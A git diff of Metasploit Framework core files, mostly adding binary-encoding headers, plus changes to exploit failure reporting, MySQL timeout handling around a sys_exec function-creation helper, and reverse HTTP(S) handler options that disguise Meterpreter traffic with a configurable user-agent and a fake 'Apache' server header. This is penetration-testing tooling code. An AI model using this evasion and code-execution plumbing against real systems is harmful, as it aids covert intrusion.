diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb
index d2185ce6c0..7de70ff6e9 100644
--- a/lib/msf/core/exploit/fmtstr.rb
+++ b/lib/msf/core/exploit/fmtstr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/ftp.rb b/lib/msf/core/exploit/ftp.rb
index a674c8466d..83bd5a7d9f 100644
--- a/lib/msf/core/exploit/ftp.rb
+++ b/lib/msf/core/exploit/ftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb
index 127f8388bc..48517b3862 100644
--- a/lib/msf/core/exploit/ftpserver.rb
+++ b/lib/msf/core/exploit/ftpserver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 82c29adf66..7fee95da7c 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'uri'
require 'digest'
require 'rex/proto/ntlm/crypt'
@@ -127,7 +128,7 @@ module Exploit::Remote::HttpClient
opts[:pattern].each do |re|
if not re.match(info)
err = "The target server fingerprint \"#{info}\" does not match \"#{re.to_s}\", use 'set FingerprintCheck false' to disable this check."
- raise RuntimeError, err
+ fail_with(Msf::Exploit::Failure::NotFound, err)
end
end
end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 3e28631ebb..ce362225d7 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/service_manager'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/encryptjs'
@@ -225,7 +226,7 @@ module Exploit::Remote::HttpServer
when /opera\/(\d+(:?\.\d+)*)/
fp[:ua_name] = HttpClients::OPERA
fp[:ua_ver] = $1
- when /mozilla\/[0-9]\.[0-9] \(compatible; msie ([0-9]\.[0-9]+)/
+ when /mozilla\/[0-9]+\.[0-9] \(compatible; msie ([0-9]+\.[0-9]+)/
fp[:ua_name] = HttpClients::IE
fp[:ua_ver] = $1
else
@@ -266,6 +267,8 @@ module Exploit::Remote::HttpServer
fp[:os_flavor] = 'Vista'
when /windows nt 6.1/
fp[:os_flavor] = '7'
+ when /windows nt 6.2/
+ fp[:os_flavor] = '8'
when /gentoo/
fp[:os_flavor] = 'Gentoo'
when /debian/
diff --git a/lib/msf/core/exploit/imap.rb b/lib/msf/core/exploit/imap.rb
index 57fedf8118..8c9cc68bbb 100644
--- a/lib/msf/core/exploit/imap.rb
+++ b/lib/msf/core/exploit/imap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/ip.rb b/lib/msf/core/exploit/ip.rb
index ed33d61c63..4a5f7dc271 100644
--- a/lib/msf/core/exploit/ip.rb
+++ b/lib/msf/core/exploit/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb
index e8c0a16a16..7be24e6aec 100644
--- a/lib/msf/core/exploit/ipv6.rb
+++ b/lib/msf/core/exploit/ipv6.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb
index 710de678a7..057ea00f2a 100644
--- a/lib/msf/core/exploit/java.rb
+++ b/lib/msf/core/exploit/java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This mixn provides methods for interacting with a JDK installation to perform
diff --git a/lib/msf/core/exploit/kernel_mode.rb b/lib/msf/core/exploit/kernel_mode.rb
index 10af56f10e..3a0d65fd5e 100644
--- a/lib/msf/core/exploit/kernel_mode.rb
+++ b/lib/msf/core/exploit/kernel_mode.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'rex/payloads/win32/kernel'
diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb
index a01b98e574..fef50a759a 100644
--- a/lib/msf/core/exploit/lorcon.rb
+++ b/lib/msf/core/exploit/lorcon.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/lorcon2.rb b/lib/msf/core/exploit/lorcon2.rb
index e3a17cda82..3abaef55a3 100644
--- a/lib/msf/core/exploit/lorcon2.rb
+++ b/lib/msf/core/exploit/lorcon2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 0bfcc1096c..a982e53717 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# All exploit mixins should be added to the list below
diff --git a/lib/msf/core/exploit/mssql.rb b/lib/msf/core/exploit/mssql.rb
index 4532b85040..e3cb309789 100644
--- a/lib/msf/core/exploit/mssql.rb
+++ b/lib/msf/core/exploit/mssql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/msf/core/exploit/mssql_commands.rb b/lib/msf/core/exploit/mssql_commands.rb
index 5168376558..a735b5b4a8 100644
--- a/lib/msf/core/exploit/mssql_commands.rb
+++ b/lib/msf/core/exploit/mssql_commands.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb
index 26b1376926..57adcb4517 100644
--- a/lib/msf/core/exploit/mssql_sqli.rb
+++ b/lib/msf/core/exploit/mssql_sqli.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb
index 186a2bbf20..5de66d3698 100644
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
@@ -57,16 +58,25 @@ module Exploit::Remote::MYSQL
end
def mysql_login_datastore
- mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
+ begin
+ res = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
+ rescue Rex::ConnectionTimeout => e
+ print_error("Timeout: #{e.message}")
+ res = nil
+ end
+
+ return res
end
def mysql_query(sql)
- res = nil
begin
res = @mysql_handle.query(sql)
rescue ::RbMysql::Error => e
print_error("MySQL Error: #{e.class} #{e.to_s}")
- return
+ return nil
+ rescue Rex::ConnectionTimeout => e
+ print_error("Timeout: #{e.message}")
+ return nil
end
res
end
@@ -106,7 +116,7 @@ module Exploit::Remote::MYSQL
def mysql_get_variable(var)
res = mysql_query("SELECT #{var}")
- if res.respond_to? :first
+ if res and res.respond_to? :first
return res.first.first
end
end
@@ -136,8 +146,12 @@ module Exploit::Remote::MYSQL
end
def mysql_drop_and_create_sys_exec(soname)
- mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
- mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
+ res = mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
+ return false if res.nil?
+
+ res = mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
+ return false if res.nil?
+
return true
end
diff --git a/lib/msf/core/exploit/ndmp.rb b/lib/msf/core/exploit/ndmp.rb
index 7ecb32deb7..420ed14c51 100644
--- a/lib/msf/core/exploit/ndmp.rb
+++ b/lib/msf/core/exploit/ndmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/ntlm.rb b/lib/msf/core/exploit/ntlm.rb
index e419063dcf..986c70ef7f 100644
--- a/lib/msf/core/exploit/ntlm.rb
+++ b/lib/msf/core/exploit/ntlm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/base'
diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb
index 6d11e93f63..41d7905fd4 100644
--- a/lib/msf/core/exploit/omelet.rb
+++ b/lib/msf/core/exploit/omelet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/exploitation/omelet'
diff --git a/lib/msf/core/exploit/oracle.rb b/lib/msf/core/exploit/oracle.rb
index 7b407b8f06..4ea80af5d6 100644
--- a/lib/msf/core/exploit/oracle.rb
+++ b/lib/msf/core/exploit/oracle.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module provides methods for communicating with a host running oracle.
diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb
index 112cff562b..630d8dc579 100644
--- a/lib/msf/core/exploit/pdf.rb
+++ b/lib/msf/core/exploit/pdf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/pdf_parse.rb b/lib/msf/core/exploit/pdf_parse.rb
index 2e0ad8f2ea..5c6b83662b 100644
--- a/lib/msf/core/exploit/pdf_parse.rb
+++ b/lib/msf/core/exploit/pdf_parse.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module provides methods for parseing and interacting
@@ -34,7 +35,9 @@ module Exploit::PDF_Parse
def trailer_parse(xref_trailer)
trailer = Hash.new()
- trailer["Size"] = xref_trailer.match(/Size (\d+)/m)[1]
+ if match = xref_trailer.match(/Size (\d+)/m)
+ trailer['Size'] = match[1]
+ end
if match = xref_trailer.match(/Root (\d+ \d)/m)
trailer["Root"] = match[1]
diff --git a/lib/msf/core/exploit/pop2.rb b/lib/msf/core/exploit/pop2.rb
index 4e115efda6..e59e65a0f1 100644
--- a/lib/msf/core/exploit/pop2.rb
+++ b/lib/msf/core/exploit/pop2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb
index decd9946d1..fa0b32f3fd 100644
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb
index 997cd7a445..3681c0f2bf 100644
--- a/lib/msf/core/exploit/riff.rb
+++ b/lib/msf/core/exploit/riff.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/seh.rb b/lib/msf/core/exploit/seh.rb
index a78db06d00..cd701eb291 100644
--- a/lib/msf/core/exploit/seh.rb
+++ b/lib/msf/core/exploit/seh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/exploitation/seh'
module Msf
diff --git a/lib/msf/core/exploit/seh.rb.ut.rb b/lib/msf/core/exploit/seh.rb.ut.rb
index d01d1313e0..54d668bdc5 100644
--- a/lib/msf/core/exploit/seh.rb.ut.rb
+++ b/lib/msf/core/exploit/seh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb
index 03f13e46b9..00f17808c1 100644
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/smb'
require 'rex/proto/ntlm'
require 'rex/proto/dcerpc'
diff --git a/lib/msf/core/exploit/smtp.rb b/lib/msf/core/exploit/smtp.rb
index 398d3c5661..a25ecae7b3 100644
--- a/lib/msf/core/exploit/smtp.rb
+++ b/lib/msf/core/exploit/smtp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb
index fdd1440ee7..fb6dfb8c43 100644
--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/snmp.rb b/lib/msf/core/exploit/snmp.rb
index 2cbfe6b386..b7d0bb70a1 100644
--- a/lib/msf/core/exploit/snmp.rb
+++ b/lib/msf/core/exploit/snmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'snmp'
diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb
index 2ab3d1c103..f7d219fadc 100644
--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/sunrpc'
module Msf
diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb
index 6dfab710cb..3be4985d3b 100644
--- a/lib/msf/core/exploit/tcp.rb
+++ b/lib/msf/core/exploit/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module EvasiveTCP
diff --git a/lib/msf/core/exploit/tcp.rb.ut.rb b/lib/msf/core/exploit/tcp.rb.ut.rb
index 2e78671765..e8803fe043 100644
--- a/lib/msf/core/exploit/tcp.rb.ut.rb
+++ b/lib/msf/core/exploit/tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb
index b06beda489..8a7655055f 100644
--- a/lib/msf/core/exploit/telnet.rb
+++ b/lib/msf/core/exploit/telnet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb
index 300b2553af..feb197e9ec 100644
--- a/lib/msf/core/exploit/tftp.rb
+++ b/lib/msf/core/exploit/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb
index 863f47664e..c7ba4ec736 100644
--- a/lib/msf/core/exploit/tns.rb
+++ b/lib/msf/core/exploit/tns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb
index c2308d230c..fb3d046ea7 100644
--- a/lib/msf/core/exploit/udp.rb
+++ b/lib/msf/core/exploit/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/vim_soap.rb b/lib/msf/core/exploit/vim_soap.rb
index c3e130adb5..5a89d74ae3 100644
--- a/lib/msf/core/exploit/vim_soap.rb
+++ b/lib/msf/core/exploit/vim_soap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Exploit::Remote::VIMSoap
diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb
index 5bf37636ed..1961b8c1f3 100644
--- a/lib/msf/core/exploit/wbemexec.rb
+++ b/lib/msf/core/exploit/wbemexec.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/wdbrpc.rb b/lib/msf/core/exploit/wdbrpc.rb
index ce4e0dfc6a..b1cbddd3f4 100644
--- a/lib/msf/core/exploit/wdbrpc.rb
+++ b/lib/msf/core/exploit/wdbrpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/wdbrpc_client.rb b/lib/msf/core/exploit/wdbrpc_client.rb
index 95ec460065..d6f62b046f 100644
--- a/lib/msf/core/exploit/wdbrpc_client.rb
+++ b/lib/msf/core/exploit/wdbrpc_client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb
index 51fed57f76..aa9b272cf6 100644
--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
@@ -204,6 +205,7 @@ protected
exploit.exploit
rescue ::Exception => e
+
if [::RuntimeError, ::Interrupt].include?(e.class)
# Wait for session, but don't wait long.
delay = 0.01
@@ -211,16 +213,77 @@ protected
# Build a user-friendly error message
msg = "#{e}"
- msg << "#{e.class}" if msg.empty?
+ unless e.class == Msf::Exploit::Failed
+ msg = "#{e.class} #{e}"
+ end
+
+ exploit.error = e
+
+ # Record the detailed reason
+ exploit.fail_detail ||= e.to_s
+
+ case e.class
+ when Msf::Exploit::Complete
+ # Nothing to show in this case
+ return
+
+ when Msf::Exploit::Failed
+ exploit.print_error("Exploit aborted due to failure: #{exploit.fail_reason}: #{msg}")
+
+ # The caller should have already set exploit.fail_reason
+ if exploit.fail_reason == Msf::Exploit::Failure::None
+ exploit.fail_reason = Msf::Exploit::Failure::Unknown
+ end
+
+ when Rex::ConnectionError
+ exploit.fail_reason = Msf::Exploit::Failure::Unreachable
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+
+ when Timeout::Error
+ exploit.fail_reason = Msf::Exploit::Failure::TimeoutExpired
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ else
+
+ # Compare as a string since not all error classes may be loaded
+ case msg
+ when /access.denied|Login Failed/i # Covers SMB as well as some generic errors
+ exploit.fail_reason = Msf::Exploit::Failure::NoAccess
+ when /connection reset/i
+ exploit.fail_reason = Msf::Exploit::Failure::Disconnected
+ when /connection timed out|SSL_connect|unreachable/i
+ exploit.fail_reason = Msf::Exploit::Failure::Unreachable
+ when /unable.*target/i
+ exploit.fail_reason = Msf::Exploit::Failure::NoTarget
+ when /execution expired/i
+ exploit.fail_reason = Msf::Exploit::Failure::TimeoutExpired
+ when /(doesn.t|not).*vulnerable|may.*patched/i
+ exploit.fail_reason = Msf::Exploit::Failure::NotVulnerable
+ end
+
+ # The caller should have already set exploit.fail_reason
+ if exploit.fail_reason == Msf::Exploit::Failure::None
+ exploit.fail_reason = Msf::Exploit::Failure::Unknown
+ end
+
+ if exploit.fail_reason == Msf::Exploit::Failure::Unknown
+ exploit.print_error("Exploit failed: #{msg}")
+ else
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ end
+
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ end
# Record the error to various places
exploit.framework.events.on_module_error(exploit, msg)
- exploit.print_error("Exploit exception: #{msg}")
- exploit.error = msg
- # Log a more verbose version
- elog("Exploit exception (#{exploit.refname}): #{e.class}: #{e}", 'core', LEV_0)
- dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
+ # Report the failure (and attempt) in the database
+ exploit.report_failure
end
# Wait the payload to acquire a session if this isn't a passive-style
@@ -235,6 +298,15 @@ protected
# Don't let interrupt pass upward
end
end
+
+ return self.session if self.session
+
+ unless exploit.fail_reason
+ exploit.fail_reason = Msf::Exploit::Failure::PayloadFailed
+ exploit.fail_detail = "No session created"
+ exploit.report_failure
+ end
+
end
#
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index fa04929615..3f363dbaf9 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/util'
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 79161f31de..c00fd4c40a 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb
index e2267b650d..4122aa3592 100644
--- a/lib/msf/core/handler/bind_tcp.rb
+++ b/lib/msf/core/handler/bind_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/bind_tcp.rb.ut.rb b/lib/msf/core/handler/bind_tcp.rb.ut.rb
index 4293d12649..436853974c 100644
--- a/lib/msf/core/handler/bind_tcp.rb.ut.rb
+++ b/lib/msf/core/handler/bind_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/handler/find_port.rb b/lib/msf/core/handler/find_port.rb
index 5bdb725eae..d8e54ac16c 100644
--- a/lib/msf/core/handler/find_port.rb
+++ b/lib/msf/core/handler/find_port.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/find_shell.rb b/lib/msf/core/handler/find_shell.rb
index 11977d8c18..96ada7a9d3 100644
--- a/lib/msf/core/handler/find_shell.rb
+++ b/lib/msf/core/handler/find_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/find_tag.rb b/lib/msf/core/handler/find_tag.rb
index d3c165d7f3..5bd37eae27 100644
--- a/lib/msf/core/handler/find_tag.rb
+++ b/lib/msf/core/handler/find_tag.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/find_tty.rb b/lib/msf/core/handler/find_tty.rb
index 03b8506689..36ffaa5d42 100644
--- a/lib/msf/core/handler/find_tty.rb
+++ b/lib/msf/core/handler/find_tty.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/none.rb b/lib/msf/core/handler/none.rb
index 61ec556865..17a40f67ff 100644
--- a/lib/msf/core/handler/none.rb
+++ b/lib/msf/core/handler/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 62232a74ff..4d525992f9 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
@@ -92,14 +93,16 @@ module ReverseHttp
[
OptString.new('LHOST', [ true, "The local listener hostname" ]),
OptPort.new('LPORT', [ true, "The local listener port", 8443 ])
- ], Msf::Handler::ReverseHttps)
+ ], Msf::Handler::ReverseHttp)
register_advanced_options(
[
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
- OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcible shut down', (24*3600*7)]),
- OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300])
- ], Msf::Handler::ReverseHttps)
+ OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
+ OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
+ OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
+ OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
+ ], Msf::Handler::ReverseHttp)
end
#
@@ -132,6 +135,8 @@ module ReverseHttp
},
comm
)
+
+ self.service.server_name = datastore['MeterpreterServerName']
# Create a reference to ourselves
obj = self
@@ -239,7 +244,15 @@ protected
blob = obj.stage_payload
- # Replace the transport string first (TRANSPORT_SOCKET_SSL
+ # Replace the user agent string with our option
+ i = blob.index("METERPRETER_UA\x00")
+ if i
+ str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+ blob[i, str.length] = str
+ print_status("Patched user-agent at offset #{i}...")
+ end
+
+ # Replace the transport string first (TRANSPORT_SOCKET_SSL)
i = blob.index("METERPRETER_TRANSPORT_SSL")
if i
str = "METERPRETER_TRANSPORT_HTTP\x00"
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 8dacb999e8..fa64753c62 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
@@ -98,8 +99,10 @@ module ReverseHttps
register_advanced_options(
[
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
- OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcible shut down', (24*3600*7)]),
- OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300])
+ OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
+ OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
+ OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
+ OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
], Msf::Handler::ReverseHttps)
end
@@ -135,6 +138,8 @@ module ReverseHttps
datastore['SSLCert']
)
+ self.service.server_name = datastore['MeterpreterServerName']
+
# Create a reference to ourselves
obj = self
@@ -240,6 +245,15 @@ protected
blob = obj.stage_payload
+ # Replace the user agent string with our option
+ i = blob.index("METERPRETER_UA\x00")
+ if i
+ str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+ blob[i, str.length] = str
+ print_status("Patched user-agent at offset #{i}...")
+ end
+
+
# Replace the transport string first (TRANSPORT_SOCKET_SSL
i = blob.index("METERPRETER_TRANSPORT_SSL")
if i
diff --git a/lib/msf/core/handler/reverse_ipv6_http.rb b/lib/msf/core/handler/reverse_ipv6_http.rb
index ef6ae91f99..d222660d62 100644
--- a/lib/msf/core/handler/reverse_ipv6_http.rb
+++ b/lib/msf/core/handler/reverse_ipv6_http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/reverse_http'
module Msf
diff --git a/lib/msf/core/handler/reverse_ipv6_https.rb b/lib/msf/core/handler/reverse_ipv6_https.rb
index dff065045b..19cf733d04 100644
--- a/lib/msf/core/handler/reverse_ipv6_https.rb
+++ b/lib/msf/core/handler/reverse_ipv6_https.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/reverse_https'
module Msf
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index adbc62c954..0604b98d6f 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'thread'
diff --git a/lib/msf/core/handler/reverse_tcp.rb.ut.rb b/lib/msf/core/handler/reverse_tcp.rb.ut.rb
index 0398354ff7..087a244bf5 100644
--- a/lib/msf/core/handler/reverse_tcp.rb.ut.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/handler/reverse_tcp_allports.rb b/lib/msf/core/handler/reverse_tcp_allports.rb
index 120cc52997..1ce70ad0bd 100644
--- a/lib/msf/core/handler/reverse_tcp_allports.rb
+++ b/lib/msf/core/handler/reverse_tcp_allports.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb
index a77b25bc9e..b4afe1914b 100644
--- a/lib/msf/core/handler/reverse_tcp_double.rb
+++ b/lib/msf/core/handler/reverse_tcp_double.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
